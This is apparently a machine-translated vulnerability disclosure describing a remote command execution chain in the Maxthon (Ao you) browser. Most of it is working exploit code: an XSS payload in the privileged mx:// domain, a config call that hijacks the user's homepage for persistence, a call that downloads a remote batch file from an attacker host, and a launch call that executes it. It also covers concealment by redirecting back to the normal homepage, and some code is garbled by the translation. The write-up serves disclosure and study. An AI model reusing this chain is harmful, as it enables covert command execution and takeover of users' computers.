Ao you Browser Remote Command Execution Vulnerability (browser design defect)

Ao you Browser Remote Command Execution Vulnerability (browser design defect)

When a user accesses a page maliciously constructed by an attacker, it can execute the remote command specified by the attacker.

After the browser was submitted several times for command execution by its predecessors, some dangerous APIs, such as File IO and maxthon. program. Program. launch, have been limited to some extent.

In addition, due to the baptism of some previous vulnerabilities (the browser command execution vulnerability), the browser has imposed restrictions on redirection between different domains, making it impossible for us to access http: // jump to some privileged domains, such as mx: // (the system will prompt that the local resources cannot be accessed), which makes it difficult to execute XSS in the privileged domain to execute commands.



--------------------------------------------------------------

0x01 obtain the privileged domain XSS

--------------------------------------------------------------



1. First, I searched mx: // from the MxWebkit. dll file to get some useful information:
 

2. I have selected one of the files mx: // res/notification/saved/index.htm for viewing:

By simply viewing the Code, it is not difficult to find that the dir parameter enters innerHTML, but the length is limited to 30.
 

3. We can construct the following URL, pop-up window test (Please test it yourself ):

mx://res/notification/saved/index.htm#a=1&dir=<svg onload%3dalert(1)>

4. the dir parameter has a length limit of 30, but this length is enough for us to call external JS files. Use "\ u2028" and Function (URL) () to execute JS. The Code is as follows:
Mx: // res/notification/saved/index.htm # a = 1 & dir = <svg onload % 3 DFunction (URL) ()> & [character: \ u2028] var s = document. createElement ("script"); s. src = "http: // 192.168.0.115/mx/poc2.js"; document. body. appendChild (s );

5. the mx: // res/notification/saved/index.htm page allows the use of maxthon. program. program. the launch API allows the XSS under the page to execute programs in the specified path, as shown in:
 

Call maxthon. program. Program. launch to bring up the calculator:

Maxthon. program. Program. launch ("C: \ windows \ system32 \ calc.exe ","");

 

--------------------------------------------------------------

0x02 How do I call the privileged domain XSS?

--------------------------------------------------------------

Because we cannot jump from the http domain to the mx domain through location. href or window. open, we cannot automatically call the XSS In the mx domain.


 

How can we call a page under the mx domain?



Through some analysis, we found that the maxthon object in the maxthon.cn domain allows access to maxthon. browser. config to change some browser user settings.



So a "trivial" method was born ~~



Change the user's default homepage to mx: // res/notification/saved/index.htm.



The Code is as follows:

maxthon.browser.config.ConfigManager.set("maxthon.config", "browser.general.multihomepage", '["mx://res/notification/saved/index.htm#a=1&url=1&dir=<svg onload%3DFunction(URL)()>&\u2028var s=document.createElement(\\\"script\\\");s.src=\\\"http://192.168.0.115/mx/poc2.2.js\\\";document.body.appendChild(s);"]')

After executing the above code, you can find that the user's homepage is indeed modified:


 

By default, the home page is automatically displayed the next time you start the browser:


 

Therefore, the next time you start the browser, mx: // res/notification/saved/index.htm will be opened, execute our malicious code, and use maxthon. program. program. launch to execute applications in the system.





--------------------------------------------------------------

0x03 use the external. mxCall function to write a temporary file and execute any command

--------------------------------------------------------------



In step 2, we can only use the system self-developed program through maxthon.program.program.launch. for example, to execute the specified command, we need to write files locally to the user.



Through research, we found that aoyou's external. the mxCall function temporarily downloads remote files to the temporary directory, and the user name is the user-specified file name (that is, the file name is not random, predictable). Take WIN7 as an example:

// When we execute

   external.mxCall('InstallSkin',  "http://192.168.0.115/mx/test.bat");

Test. bat is generated in the temporary directory.


 

Next, we need to know where the path of the temporary directory is?



Ao you browser also provides us with the corresponding API:
 

Var p = maxthon. system. Environment. getFolderPath ('mx3data ');

// Obtain the temporary directory path var tmp = p + "Temp \\";

* It is worth noting that external. mxCall can only be executed in the * .maxthon.cn domain and cannot be executed in mx.



--------------------------------------------------------------

0x04 Summary

--------------------------------------------------------------



A. We can find an XSS under * .maxthon.cn. I will not find it here. I will directly use the FLASH XSS IN THE my.maxthon.cn domain in the previous vulnerability.
 

<script>window.name='var s=document.createElement("script");s.src="http://192.168.0.115/mx/poc2.1.js?"+Math.random();document.body.appendChild(s);';location.href='http://my.maxthon.cn//public/images/swfupload.swf?preventswfcaching=1414769360525&movieName=aaa"])}catch(e){if(!window.wy){window.wy=1;window.name%26%26eval(window.name);}};//';</script>

B. The above code will call http: // 192.168.0.115/mx/poc2.1.js. The JS Code is as follows:
 

(Function () {// download Remote test. bat to the local Temp directory external. mxCall ('installskin', "http: // 192.168.0.115/mx/test. bat "); // set the user's browser home page to the address in the mx: // domain that we use maxthon. browser. config. configManager. set ("maxthon. config "," browser. general. multihomepage ", '[" mx: // res/notification/saved/index.htm # a = 1 & url = 1 & dir = <svg onload % 3 DFunction (URL) ()> & \ u2028var s = document. createElement (\\\ "script \\\"); s. src =\\ "http: // 192.168.0.115/mx/poc2.2.js \\\"; document. body. appendChild (s); "] ')}) ();

This JS mainly implements two functions,

First, download a test. bat file to the temporary directory,

Second, change the user homepage to mx: // res/notification/saved/index.htm #... XSS code...



C. when the user starts the browser next time, mx: // res/notification/saved/index.htm #.. XSS code... the XSS code will be automatically opened and executed. The XSS code will call http: // 192.168.0.115/mx/poc2.2.js. The Code is as follows:

(Function () {// obtain the temporary directory path var p = maxthon. system. environment. getFolderPath ('mx3data'); var l = p + "\ Temp \"; // execute the test downloaded in step B. batmaxthon. program. program. launch (l + "test. bat ","");})();

In this step, test. bat under the temporary directory will be executed.



--------------------------------------------------



In general, this is the figure below:
 

For details, see the video demonstration in vulnerability proof.

See the effect of video demonstration (WIN7): http://v.youku.com/v_show/id_XODE5MDEwOTQ0.html

Password: wooyuncmdr

In the video demonstration, the content of test. bat is cmd/k ipconfig.

Because the mx: // protocol can jump to http: //, the modified User homepage can jump to the normal user homepage after executing the command, so as to achieve certain concealment.

Solution:

Filter